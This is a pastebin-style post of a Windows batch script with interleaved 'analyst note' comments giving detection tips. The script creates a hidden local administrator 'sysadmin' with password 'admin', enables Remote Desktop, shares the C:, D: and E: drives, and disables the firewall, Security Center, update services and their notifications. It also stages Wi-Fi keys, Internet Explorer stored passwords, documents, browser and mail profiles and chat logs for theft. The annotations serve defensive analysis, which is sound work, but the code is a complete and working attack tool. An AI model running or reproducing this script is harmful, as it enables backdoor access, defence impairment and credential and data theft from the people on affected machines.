
Untitled

a guest
May 14th, 2017
  REM [analyst note] Collection-and-tampering batch script. Everything it gathers is written to a
  REM per-computer folder under ..\.\Documents, relative to the directory the script is launched from,
  REM with a per-user .txt file as the running log. That folder is the staging area to look for.
  REM The killswitch check jumps to :end when c:\killswitch.txt exists. It is the operator's own
  REM opt-out and should not be relied on as a protective control.
  REM Each later section is skipped when a matching ..\system\Settings\*dis.set file exists.
  1. echo. off
  2. if exist c:\killswitch.txt goto end
  3. if not exist ..\.\Documents\%computername% mkdir ..\.\Documents\%computername% >nul
  4. set infolog=>> ..\.\Documents\%computername%\%username%.txt
  5. :Sinfo
  6. if exist "..\system\Settings\sinfodis.set" goto :SRemoteinfo
  7. echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  8. echo -----System Info--- >> ..\.\Documents\%computername%\%username%.txt
  9. echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  10. echo off
  REM [analyst note] Host discovery: logs computer and user name, timestamp, logon server, OS,
  REM CPU count, local Administrators membership, ipconfig /all output and the process list.
  REM The "route pring" and "getmac" lines only echo that literal text into the log.
  REM Detection: one cmd.exe parent spawning net.exe, ipconfig.exe and tasklist.exe within seconds
  REM is a useful process-creation signal (Security event 4688 or Sysmon event 1).
  11. echo Computer Name is: %computername% >> ..\.\Documents\%computername%\%username%.txt
  12. echo User Name: %username% >> ..\.\Documents\%computername%\%username%.txt
  13. echo The date and Time is: %date% %time% >> ..\.\Documents\%computername%\%username%.txt
  14. echo >> ..\.\Documents\%computername%\%username%.txt
  15. echo [+]name of the domain controller that validated the current logon session. >> ..\.\Documents\%computername%\%username%.txt
  16. echo %logonserver% >> ..\.\Documents\%computername%\%username%.txt
  17. echo >> ..\.\Documents\%computername%\%username%.txt
  18. echo [+]IP Routing tables and Gateway >> ..\.\Documents\%computername%\%username%.txt
  19. echo route pring >> ..\.\Documents\%computername%\%username%.txt
  20. echo >> ..\.\Documents\%computername%\%username%.txt
  21. echo [+] MAC Address >> ..\.\Documents\%computername%\%username%.txt
  22. echo getmac >> ..\.\Documents\%computername%\%username%.txt
  23. echo >> ..\.\Documents\%computername%\%username%.txt
  24. echo [+] Operating System type. >> ..\.\Documents\%computername%\%username%.txt
  25. echo %OS% >> ..\.\Documents\%computername%\%username%.txt
  26. echo >> ..\.\Documents\%computername%\%username%.txt
  27. echo [+]Number of Processors Installed. >> ..\.\Documents\%computername%\%username%.txt
  28. echo %NUMBER_OF_PROCESSORS% >> ..\.\Documents\%computername%\%username%.txt
  29. echo >> ..\.\Documents\%computername%\%username%.txt
  30. echo [+] List of Administrators >> ..\.\Documents\%computername%\%username%.txt
  31. net localgroup administrators >> ..\.\Documents\%computername%\%username%.txt
  32. echo off
  33. echo >> ..\.\Documents\%computername%\%username%.txt
  34. echo [+] Network adapters >> ..\.\Documents\%computername%\%username%.txt
  35. ipconfig /all >> ..\.\Documents\%computername%\%username%.txt
  36. echo >> ..\.\Documents\%computername%\%username%.txt
  37. echo [+] Task List >> ..\.\Documents\%computername%\%username%.txt
  38. tasklist >> ..\.\Documents\%computername%\%username%.txt
  39. echo >> ..\.\Documents\%computername%\%username%.txt
  40. :SRemoteInfo
  41. if exist "..\system\Settings\SremoteInfodis.set" goto :Suser
  42. echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  43. echo ----Remote info---- >> ..\.\Documents\%computername%\%username%.txt
  44. echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  45. echo off
  REM [analyst note] Network and account discovery: ARP cache, net group, local shares, user accounts,
  REM mapped connections (net use), hosts visible to net view and the local NetBIOS name table.
  REM All output is appended to the same log file, so a recovered log shows exactly what was learned.
  REM The section labels written to the log do not always match what the command returns.
  46. echo [+] Arp Information >> ..\.\Documents\%computername%\%username%.txt
  47. arp -a >> ..\.\Documents\%computername%\%username%.txt
  48. echo >> ..\.\Documents\%computername%\%username%.txt
  49. echo [+] Listed Domain Users >> ..\.\Documents\%computername%\%username%.txt
  50. net group >> ..\.\Documents\%computername%\%username%.txt
  51. echo >> ..\.\Documents\%computername%\%username%.txt
  52. echo [+] Listed Local shares >> ..\.\Documents\%computername%\%username%.txt
  53. net share >> ..\.\Documents\%computername%\%username%.txt
  54. echo >> ..\.\Documents\%computername%\%username%.txt
  55. echo [+] List of Users >> ..\.\Documents\%computername%\%username%.txt
  56. net user >> ..\.\Documents\%computername%\%username%.txt
  57. echo >> ..\.\Documents\%computername%\%username%.txt
  58. echo [+] Current Connected Users >> ..\.\Documents\%computername%\%username%.txt
  59. net use >> ..\.\Documents\%computername%\%username%.txt
  60. echo >> ..\.\Documents\%computername%\%username%.txt
  61. echo [+] Listed Current Shares with ID Tags >> ..\.\Documents\%computername%\%username%.txt
  62. net view >> ..\.\Documents\%computername%\%username%.txt
  63. echo >> ..\.\Documents\%computername%\%username%.txt
  64. echo [+] Current Machines Connected >> ..\.\Documents\%computername%\%username%.txt
  65. nbtstat -n >> ..\.\Documents\%computername%\%username%.txt
  66. :Suser
  67. if exist "..\system\Settings\suserdis.set" goto :Huser
  68. echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  69. echo -----Created System User----- >> ..\.\Documents\%computername%\%username%.txt
  70. echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  REM [analyst note] Backdoor account: creates local user "sysadmin" with the password "admin",
  REM adds it to the local Administrators group, then records both values in the log.
  REM Hunt for an unexpected local account of that name and for Security events 4720 (account
  REM created) and 4732 (member added to a local group). Remove the account and review its logons.
  71. net user sysadmin admin /add /y >> ..\.\Documents\%computername%\%username%.txt
  72. net localgroup Administrators sysadmin /add /y >> ..\.\Documents\%computername%\%username%.txt
  73. echo Username: sysadmin >> ..\.\Documents\%computername%\%username%.txt
  74. echo Password: admin >> ..\.\Documents\%computername%\%username%.txt
  75. :Huser
  76. if exist "..\system\Settings\huserdis.set" goto :RDP
  77. echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  78. echo -----UserName Hidden From Welcome Screen----- >> ..\.\Documents\%computername%\%username%.txt
  79. echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  REM [analyst note] Writes a "sysadmin" value of 0 under Winlogon\SpecialAccounts\UserList, the setting
  REM that keeps an account off the Welcome screen. Any value under this key deserves an alert;
  REM compare the key against net user output to find accounts that exist but are not shown.
  80. reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v sysadmin /t REG_DWORD /d 0 /f /y >> ..\.\Documents\%computername%\%username%.txt
  81. echo Done. >> ..\.\Documents\%computername%\%username%.txt
  82. :RDP
  83. if exist "..\system\Settings\RDPdis.set" goto :shares
  84. echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  85. echo -----Enabled Remote Desktop----- >> ..\.\Documents\%computername%\%username%.txt
  86. echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  REM [analyst note] Sets fDenyTSConnections to 0, which allows Remote Desktop connections. Combined
  REM with the administrator account this script adds, it provides remote interactive access.
  REM Monitor this value for change and restore it to 1 on hosts where RDP is not intended.
  87. reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0 >> ..\.\Documents\%computername%\%username%.txt
  88. echo Done. >> ..\.\Documents\%computername%\%username%.txt
  89. :shares
  90. if exist "..\system\Settings\sharesdis.set" goto :registry
  91. echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  92. echo -----Created System Shares----- >> ..\.\Documents\%computername%\%username%.txt
  93. echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  REM [analyst note] Shares the roots of C:, D: and E: under the names C, D and E. The "Created" lines
  REM are written to the log whether or not the share command succeeded.
  REM Review net share output and Security event 5142 (network share added), and delete any
  REM root-drive shares that were not created by an administrator.
  94. net share C=C: >> ..\.\Documents\%computername%\%username%.txt
  95. net share D=D: >> ..\.\Documents\%computername%\%username%.txt
  96. net share E=E: >> ..\.\Documents\%computername%\%username%.txt
  97. echo C: Created >> ..\.\Documents\%computername%\%username%.txt
  98. echo D: Created >> ..\.\Documents\%computername%\%username%.txt
  99. echo E: Created >> ..\.\Documents\%computername%\%username%.txt
  100. :Registry
  101. if exist "..\system\Settings\registrydis.set" goto :sysprotect
  102. echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  103. echo -----Registry Tweaks----- >> ..\.\Documents\%computername%\%username%.txt
  104. echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  REM [analyst note] Defense impairment through the registry: EnableFirewall is set to 0 on the
  REM StandardProfile firewall policy (the path is hard-coded to ControlSet001), and Security Center
  REM values are set so that antivirus, firewall and update warnings are suppressed. The user is
  REM therefore not told that protection is off.
  REM Detection: registry-write auditing (Security event 4657 or Sysmon event 13) on the
  REM FirewallPolicy subtree and on SOFTWARE\Microsoft\Security Center.
  105. reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v EnableFirewall /t REG_DWORD /d 00000000 /f
  106. reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center" /v AntiVirusDisableNotify /t REG_DWORD /d 00000001 /f
  107. reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center" /v FirewallDisableNotify /t REG_DWORD /d 00000001 /f
  108. reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center" /v UpdatesDisableNotify /t REG_DWORD /d 00000001 /f
  109. reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center" /v FirewallOverride /t REG_DWORD /d 00000001 /f
  110. reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v DisableNotifications /t REG_DWORD /d 00000001 /f
  111. echo +Disabled MS Updates Notifications >> ..\.\Documents\%computername%\%username%.txt
  112. echo +Disabled MS AntiVirus Notifications >> ..\.\Documents\%computername%\%username%.txt
  113. echo +Disabled MS Firewall Notifications >> ..\.\Documents\%computername%\%username%.txt
  114. echo +Disabled MS Firewall >> ..\.\Documents\%computername%\%username%.txt
  115. :Sysprotect
  116. if exist "..\system\Settings\sysprotectdis.set" goto :wifikey
  117. echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  118. echo -----System Protection Disabled----- >> ..\.\Documents\%computername%\%username%.txt
  119. echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  REM [analyst note] Stops the update, DefWatch, firewall and Security Center services by display name,
  REM turns the firewall off with netsh, and sets the wscsvc service start type to disabled.
  REM The log lists "MS Defender" among the disabled items although no service of that name is
  REM stopped here, so treat the log as a statement of intent and verify service state on the host.
  REM Detection: Service Control Manager events 7036 (service stopped) and 7040 (start type changed),
  REM plus process creation for net.exe stop, netsh.exe firewall and sc.exe config.
  120. net stop "Automatic Updates" /y
  121. net stop "DefWatch" /y
  122. net stop "Microsoft Firewall" /y
  123. net stop "Windows Firewall/Internet Connection Sharing (ICS)" /y
  124. net stop "security center" /y
  125. netsh firewall set opmode disable
  126. sc config wscsvc start= disabled
  127. echo Disabled Services >> ..\.\Documents\%computername%\%username%.txt
  128. echo + MS Defender >> ..\.\Documents\%computername%\%username%.txt
  129. echo + Ms Firewall >> ..\.\Documents\%computername%\%username%.txt
  130. echo + Ms Security Center >> ..\.\Documents\%computername%\%username%.txt
  131. echo + MS Update >> ..\.\Documents\%computername%\%username%.txt
  132. :WiFiKey
  133. if exist "..\system\Settings\Wifikeydis.set" goto :ieurl
  134. echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  135. echo -----Export Wireless Key----- >> ..\.\Documents\%computername%\%username%.txt
  136. echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  REM [analyst note] Wireless credential collection: exports the XP WZCSVC interface parameters and
  REM copies the Vista/7 Wlansvc profile folder into a WifiKey staging folder. The script's own log
  REM line says the key material is stored encrypted and is meant to be decrypted elsewhere.
  REM Response: rotate the pre-shared keys of every network saved on an affected host.
  REM NOTE(review): the lines starting with a semicolon are not REM comments. Confirm in a sandbox
  REM how cmd.exe handles them before assuming the wkv.exe, copy and del lines are inactive.
  137. if not exist "..\.\Documents\%computername%\WifiKey" mkdir "..\.\documents\%computername%\WifiKey"
  138. ;XP
  139. reg export HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WZCSVC\Parameters\Interfaces ..\.\documents\%computername%\wifikey\wifi.reg
  140. ;Vista/win7
  141. xcopy %programdata%\Microsoft\Wlansvc\Profiles\Interfaces ..\.\documents\%computername%\wifikey\ /E
  142. echo These Keys will be encrypted, use wifi program to decrypt once you have import to right areas >> ..\.\Documents\%computername%\%username%.txt
  143. ; .\Tools\wkv.exe /stext "%computername%_wk.log" >> ..\.\Documents\%computername%\%username%.txt
  144. ; copy %computername%.html+%computername%_wk.log* >> ..\.\Documents\%computername%\%username%.txt
  145. ; del /f /q "%computername%_wk.log" >nul
  146. :IEurl
  147. if exist "..\system\Settings\ieurldis.set" goto :iepw
  148. echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  149. echo -----Registery Dump on IE Typed URLs----- >> ..\.\Documents\%computername%\%username%.txt
  150. echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  REM [analyst note] Read-only query of the current user's Internet Explorer TypedURLs key; the
  REM addresses the user typed by hand end up in the log file.
  151. reg query "HKCU\Software\Microsoft\Internet Explorer\TypedURLs" >> ..\.\Documents\%computername%\%username%.txt
  152. :IEpw
  153. if exist "..\system\Settings\iepwdis.set" goto :startup
  154. echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  155. echo -----Registery Dump on IE Crypted Passwords----- >> ..\.\Documents\%computername%\%username%.txt
  156. echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  REM [analyst note] Dumps the current user's IntelliForms key, which the script labels as Internet
  REM Explorer's encrypted password store. The note line shows the intent to replay the values on
  REM another machine, so treat credentials saved in IE on an affected profile as exposed.
  157. reg query "HKCU\Software\Microsoft\Internet Explorer\IntelliForms" >> ..\.\Documents\%computername%\%username%.txt
  158. echo Note: Create a reg Key With values and import to local machine then use software. >> ..\.\Documents\%computername%\%username%.txt
  159. :StartUp
  160. if exist "..\system\Settings\startupdis.set" goto :recent
  161. echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  162. echo -----Registery Dump on Startups----- >> ..\.\Documents\%computername%\%username%.txt
  163. echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  REM [analyst note] Read-only query of the current user's Run and RunOnce keys. Nothing is written to
  REM the registry here; the autostart entries are only listed in the log.
  164. reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run >> ..\.\Documents\%computername%\%username%.txt
  165. reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Runonce >> ..\.\Documents\%computername%\%username%.txt
  166. :Recent
  167. if exist "..\system\Settings\recentdis.set" goto :text
  168. echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  169. echo -----Dump Recently Opened Files----- >> ..\.\Documents\%computername%\%username%.txt
  170. echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  REM [analyst note] Copies the contents of the user's Recent folder (shortcuts to recently opened
  REM files) into a "Recently Opened" staging folder. The shortcuts reveal file names and paths
  REM even when the documents themselves are not taken. The script notes this path is XP-era only.
  171. mkdir "..\.\Documents\%Computername%\Recently Opened"
  172. copy "%USERPROFILE%\Recent" "..\.\Documents\%Computername%\Recently Opened" /y
  173. echo Copied. >> ..\.\Documents\%computername%\%username%.txt
  174. echo Will not work on Win7. >> ..\.\Documents\%computername%\%username%.txt
  175. :Text
  176. if exist "..\system\Settings\indexdis.set" goto :index
  177. echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  178. echo -----Dump Text Documents----- >> ..\.\Documents\%computername%\%username%.txt
  179. echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  REM [analyst note] Bulk document collection: xcopy takes office, text, database, CSV and log files
  REM by extension from My Documents and Desktop into a Files staging folder. The /c /q /h switches
  REM keep it running past errors, suppress file names and include hidden and system files.
  REM The Found / Not Found lines at the end test the Desktop folder only.
  REM Detection: a burst of xcopy.exe processes reading user profile folders and writing to another
  REM volume. Scoping: every matching file in those two folders should be assumed copied.
  180. MkDir ..\.\Documents\%computername%\Files
  181. set Files="..\.\Documents\%computername%\Files\" /c /q /r /h /y /i
  182. set doc=If not Exist "%USERPROFILE%\My Documents\
  183. set desk=If not Exist "%USERPROFILE%\Desktop\
  184. xcopy "%USERPROFILE%\My Documents\*.txt" %files%
  185. xcopy "%USERPROFILE%\My Documents\*.doc" %files%
  186. xcopy "%USERPROFILE%\My Documents\*.wpd" %files%
  187. xcopy "%USERPROFILE%\My Documents\*.rtf" %files%
  188. xcopy "%USERPROFILE%\My Documents\*.xls" %files%
  189. xcopy "%USERPROFILE%\My Documents\*.docx" %files%
  190. xcopy "%USERPROFILE%\My Documents\*.ppt" %files%
  191. xcopy "%USERPROFILE%\My Documents\*.pptx" %files%
  192. xcopy "%USERPROFILE%\My Documents\*.mdb" %files%
  193. xcopy "%USERPROFILE%\My Documents\*.csv" %files%
  194. xcopy "%USERPROFILE%\My Documents\*.log" %files%
  195. xcopy "%USERPROFILE%\Desktop\*.txt" %files%
  196. xcopy "%USERPROFILE%\Desktop\*.doc" %files%
  197. xcopy "%USERPROFILE%\Desktop\*.wpd" %files%
  198. xcopy "%USERPROFILE%\Desktop\*.rtf" %files%
  199. xcopy "%USERPROFILE%\Desktop\*.xls" %files%
  200. xcopy "%USERPROFILE%\Desktop\*.docx" %files%
  201. xcopy "%USERPROFILE%\Desktop\*.ppt" %files%
  202. xcopy "%USERPROFILE%\Desktop\*.pptx" %files%
  203. xcopy "%USERPROFILE%\Desktop\*.mdb" %files%
  204. xcopy "%USERPROFILE%\Desktop\*.csv" %files%
  205. %desk%*.txt" (echo Text Files Not Found. >> ..\.\Documents\%computername%\%username%.txt) ELSE (echo Text Files Found. >> ..\.\Documents\%computername%\%username%.txt)
  206. %desk%*.doc" (echo Document Files Not Found. >> ..\.\Documents\%computername%\%username%.txt) ELSE (echo Document Files Found. >> ..\.\Documents\%computername%\%username%.txt)
  207. %desk%*.wpd" (echo WordPad Files Not Found. >> ..\.\Documents\%computername%\%username%.txt) ELSE (echo WordPad Files Found. >> ..\.\Documents\%computername%\%username%.txt)
  208. %desk%*.rtf" (echo Rich Text File Not Found. >> ..\.\Documents\%computername%\%username%.txt) ELSE (echo Rich Text File Found. >> ..\.\Documents\%computername%\%username%.txt)
  209. %desk%*.xls" (echo Microsoft Excel Files Not Found. >> ..\.\Documents\%computername%\%username%.txt) ELSE (echo Microsoft Excel Files Found. >> ..\.\Documents\%computername%\%username%.txt)
  210. %desk%*.docx" (echo Document Files Not Found. >> ..\.\Documents\%computername%\%username%.txt) ELSE (echo Document Files Found. >> ..\.\Documents\%computername%\%username%.txt)
  211. %desk%*.ppt" (echo Microsoft PowerPoint Files Not Found. >> ..\.\Documents\%computername%\%username%.txt) ELSE (echo Microsoft PowerPoint Files Found. >> ..\.\Documents\%computername%\%username%.txt)
  212. %desk%*.pptx" (echo Microsoft PowerPoint Files Not Found. >> ..\.\Documents\%computername%\%username%.txt) ELSE (echo Microsoft PowerPoint Files Found. >> ..\.\Documents\%computername%\%username%.txt)
  213. %desk%*.mdb" (echo Microsoft Access Files Not Found. >> ..\.\Documents\%computername%\%username%.txt) ELSE (echo Microsoft Access Files Found. >> ..\.\Documents\%computername%\%username%.txt)
  214. %desk%*.csv" (echo comma-separated value Files Not Found. >> ..\.\Documents\%computername%\%username%.txt) ELSE (echo comma-separated value Files Found. >> ..\.\Documents\%computername%\%username%.txt)
  215. %desk%*.log" (echo Log Files Not Found. >> ..\.\Documents\%computername%\%username%.txt) ELSE (echo Log Files Found. >> ..\.\Documents\%computername%\%username%.txt)
  216. :index
  217. if exist "..\system\Settings\indexdis.set" goto :iefavs
  REM [analyst note] Browsing-history collection: for each Internet Explorer index.dat location
  REM (cookies, history, temporary internet files, UserData; Vista/7 paths first, then XP/2000 paths)
  REM the script clears the read-only, archive, system and hidden attributes with attrib and then
  REM copies the file into the staging area.
  REM Host artifact: the attrib calls change attributes on the ORIGINAL files, so index.dat files that
  REM have lost their system and hidden flags are a sign this section ran.
  218. if not exist "..\.\Documents\%computer%\IEindex" mkdir "..\.\Documents\%computer%"
  219. echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  220. echo -----Dump IE History index.dat File----- >> ..\.\Documents\%computername%\%username%.txt
  221. echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  222. ;Win7/Vista
  223. attrib -r -a -s -h "%userprofile%\appdata\\Roaming\Microsoft\Windows\Cookies\index.dat"
  224. copy /Y "%userprofile%\appdata\Roaming\Microsoft\Windows\Cookies\index.dat" "..\.\Documents\%computer%\IEindex\index1.dat'
  225. attrib -a -r -s -h "%userprofile%\appdata\\Roaming\Microsoft\Windows\Cookies\Low\index.dat"
  226. copy /Y "%userprofile%\appdata\Roaming\Microsoft\Windows\Cookies\Low\index.dat" "..\.\Documents\%computer%\IEindex\index2.dat"
  227. attrib -r -a -s -h "%userprofile%\appdata\\Local\Microsoft\Windows\History\History.IE5\index.dat"
  228. copy /Y "%userprofile%\appdata\Local\Microsoft\Windows\History\History.IE5\index.dat" "..\.\Documents\%computer%\IEindex\index3.dat"
  229. attrib -r -a -s -h "%userprofile%\appdata\\Local\Microsoft\Windows\History\History.IE5\Low\index.dat"
  230. copy /Y "%userprofile%\appdata\Local\Microsoft\Windows\History\History.IE5\Low\index.dat" "..\.\Documents\%computer%\IEindex\index4.dat"
  231. attrib -r -a -s -h "%userprofile%\appdata\\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat"
  232. copy /Y "%userprofile%\appdata\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat" "..\.\Documents\%computer%\IEindex\index7.dat"
  233. attrib -r -a -s -h "%userprofile%\appdata\\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.dat"
  234. copy /Y "%userprofile%\appdata\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.dat" "..\.\Documents\%computer%\IEindex\index8.dat"
  235. attrib -r -a -s -h "%userprofile%\appdata\\Roaming\Microsoft\Internet Explorer\UserData\index.dat"
  236. copy /Y "%userprofile%\appdata\Roaming\Microsoft\Internet Explorer\UserData\index.dat" "..\.\Documents\%computer%\IEindex\index9.dat"
  237. attrib -r -a -s -h "%userprofile%\appdata\\Roaming\Microsoft\Internet Explorer\UserData\Low\index.dat"
  238. copy /Y "%userprofile%\appdata\Roaming\Microsoft\Internet Explorer\UserData\Low\index.dat" "..\.\Documents\%computer%\IEindex\index0.dat"
  239. ;WinXP/2000
  240. attrib -r -a -s -h "%userprofile%\Cookies\index.dat"
  241. copy /Y "%userprofile%\Cookies\index.dat" "..\.\Documents\%computername%\index1.dat"
  242. attrib -r -a -s -h %userprofile%\Local Settings\History\History.IE5\index.dat"
  243. copy /Y "%userprofile%\Local Settings\History\History.IE5\index.dat" "..\.\Documents\%computername%\index2.dat"
  244. attrib -r -a -s -h %userprofile%\Local Settings\Temporary Internet Files\Content.IE5\index.dat"
  245. copy /Y "%userprofile%\Local Settings\Temporary Internet Files\Content.IE5\index.dat" "..\.\Documents\%computername%\index4.dat"
  246. attrib -r -a -s -h "%userprofile%\UserData\index.dat"
  247. copy /Y "%userprofile%\UserData\index.dat" "..\.\Documents\%computername%\index5.dat"
  248. :IEfavs
  249. if exist "..\system\Settings\iefavsdis.set" goto :chat
  250. echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  251. echo -----Dump Internet Explorer Favorites----- >> ..\.\Documents\%computername%\%username%.txt
  252. echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  REM [analyst note] Browser and mail profile collection. Despite the "Favorites" banner this section
  REM also takes Firefox signons and .db files, Thunderbird profiles, Opera profile and mail data and
  REM Netscape profile databases, in addition to Internet Explorer Favorites.
  REM Response: treat logins saved in these browsers and mail clients as exposed and reset them.
  REM Detection: xcopy.exe reading Mozilla, Thunderbird or Opera profile directories is rare in
  REM normal use and makes a good file-access or command-line rule.
  253. set interb="..\.\Documents\%computername%\InternetBroswers
  254. if exist "%APPDATA%\Mozilla\Firefox\*" mkdir "%interb%\FireFox" && echo FireFox Found. >> ..\.\Documents\%computername%\%username%.txt
  255. if exist "%APPDATA%\Thunderbird\*" mkdir "%interb%\Thunderbird" && echo Thunderbird Found. >> ..\.\Documents\%computername%\%username%.txt
  256. if exist "%APPDATA%\netscape\NSB\*" mkdir "%interb%\netScape" && echo netScape Found. >> ..\.\Documents\%computername%\%username%.txt
  257. if exist "%APPDATA%\Opera\Opera\*" mkdir "%interb%\Opera" && echo Opera Found. >> ..\.\Documents\%computername%\%username%.txt
  258. if exist "%USERPROFILE%\Favorites\*" mkdir "%interb%\IExplorer\" && echo MS IE Found. >> ..\.\Documents\%computername%\%username%.txt
  259. xcopy "%USERPROFILE%\Favorites\*" "%interb%\IExplorer\" /s /c /q /r /h /y /i
  260. xcopy "%APPDATA%\netscape\NSB\Profiles\*.db" "%interb%\netScape\" /s /c /q /r /h /y /i
  261. xcopy "%APPDATA%\netscape\NSB\Profiles\*.dat" "%interb%\netScape\" /s /c /q /r /h /y /i
  262. xcopy "%APPDATA%\netscape\NSB\Profiles\*bookmarks.html" "%interb%\netScape\" /s /c /q /r /h /y /i
  263. xcopy "%APPDATA%\Opera\Opera\profile\*.dat" "%interb%\Opera\" /s /c /q /r /h /y /i
  264. xcopy "%APPDATA%\Opera\Opera\mail\*.dat" "%interb%\Opera\" /s /c /q /r /h /y /i
  265. xcopy "%APPDATA%\Opera\Opera\mail\*.ini" "%interb%\Opera\" /s /c /q /r /h /y /i
  266. xcopy "%APPDATA%\Mozilla\Firefox\Profiles\*signons*" "%interb%\FireFox\" /s /c /q /r /h /y /i
  267. xcopy "%APPDATA%\Mozilla\Firefox\Profiles\*default*.txt" "%interb%\FireFox\" /s /c /q /r /h /y /i
  268. xcopy "%APPDATA%\Mozilla\Firefox\Profiles\*.db" "%interb%\FireFox\" /s /c /q /r /h /y /i
  269. xcopy "%APPDATA%\Mozilla\Firefox\Profiles\*default*\*.db" "%interb%\FireFox\" /s /c /q /r /h /y /i
  270. xcopy "%APPDATA%\Mozilla\Firefox\Profiles\*.html" "%interb%\FireFox" /s /c /q /r /h /y /i
  271. xcopy "%APPDATA%\Thunderbird\Profiles\*" "%interb%\ThunderBird\*" /s /c /q /r /h /y /i
  272. :chat
  273. if exist "..\system\Settings\chatdis.set" goto :QB
  274. echo -------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  275. echo -----Dump Chat Logs----- >> ..\.\Documents\%computername%\%username%.txt
  276. echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  REM [analyst note] Instant-messaging collection: checks for MSN, Skype, Trillian, Yahoo, Miranda,
  REM Gaim, ICQ, Pidgin, MySpace IM, mIRC, Xfire and AIM data, records which were found, then copies
  REM logs and profile data into a ChatLogs staging folder. Whole-directory copies (Skype, Miranda,
  REM the Pidgin .purple folder) can include account configuration as well as conversation history.
  REM Response: the "Found" lines in a recovered log tell you which clients need credential resets.
  277. set chatlog=..\.\Documents\%computername%\ChatLogs
  278. Mkdir %chatlog%
  279. if exist "%USERPROFILE%\My Documents\My Received Files\*" mkdir "%chatlog%\MSN" && echo MSN Found. >> ..\.\Documents\%computername%\%username%.txt
  280. if exist "%APPDATA%\Skype\*" mkdir "%chatlog%\Skype" && echo Skype Found. >> ..\.\Documents\%computername%\%username%.txt
  281. if exist "%programfiles%\Trillian\*" mkdir "%chatlog%\Trillian" && echo Trillian Found. >> ..\.\Documents\%computername%\%username%.txt
  282. if exist "%programfiles%\Yahoo!\Messenger\*" mkdir "%chatlog%\Yahoo*" && echo Yahoo Found. >> ..\.\Documents\%computername%\%username%.txt
  283. if exist "%programfiles%\Miranda\*" mkdir "%chatlog%\Miranda" && echo Miranda Found. >> ..\.\Documents\%computername%\%username%.txt
  284. if exist "%APPDATA%\gaim\*" mkdir "%chatlog%\gaim" && echo Gaim Found. >> ..\.\Documents\%computername%\%username%.txt
  285. if exist "%USERPROFILE%\My Documents\ICQ Lite\*" mkdir "%chatlog%\ICQ" && echo ICQ Found. >> ..\.\Documents\%computername%\%username%.txt
  286. if exist "%APPDATA%\*purple*" mkdir "%chatlog%\Pidgin" && echo Pidgin Found. >> ..\.\Documents\%computername%\%username%.txt
  287. if exist "%APPDATA%\MySpace*\IM\Logs\*" mkdir "%chatlog%\MySpace\" && echo MySpace Found. >> ..\.\Documents\%computername%\%username%.txt
  288. if exist "%APPDATA%\mIRC\logs\*.*" mkdir "%chatlog%\Mirc\" && echo Mirc found. >> ..\.\Documents\%computername%\%username%.txt
  289. if exist "%APPDATA%\xfire\*" mkdir "%chatlog%\xFire\" && echo xFire Found. >> ..\.\Documents\%computername%\%username%.txt
